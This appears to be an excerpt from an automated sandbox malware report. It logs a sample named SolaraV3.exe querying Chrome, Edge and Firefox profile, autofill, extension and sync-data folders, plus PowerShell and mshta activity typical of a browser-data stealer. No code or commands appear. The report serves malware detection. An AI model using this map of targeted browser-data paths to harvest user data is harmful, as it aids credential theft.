Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\6f70cc77-7837-4f44-9c31-7de59e446d67 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\6f70cc77-7837-4f44-9c31-7de59e446d67 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\cs VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\da VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\en VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\en_GB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\fi VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\fil VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\it VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\id VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\nl VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ru VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_metadata VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\6f70cc77-7837-4f44-9c31-7de59e446d67 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\en VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\fr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\pt_PT VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ro VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ru VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sk VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sl VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sv VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\th VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\tr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\uk VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\vi VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\zh_CN VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\zh_TW VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_metadata VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\FileTypePolicies VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\MediaFoundationWidevineCdm\x64 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows PowerShell VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill\4.0.0.8 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\AutoLaunchProtocolsComponent VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\AutoLaunchProtocolsComponent VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill\4.0.0.8 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\AutoLaunchProtocolsComponent VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\AutoLaunchProtocolsComponent\1.0.0.8 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\attachments VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
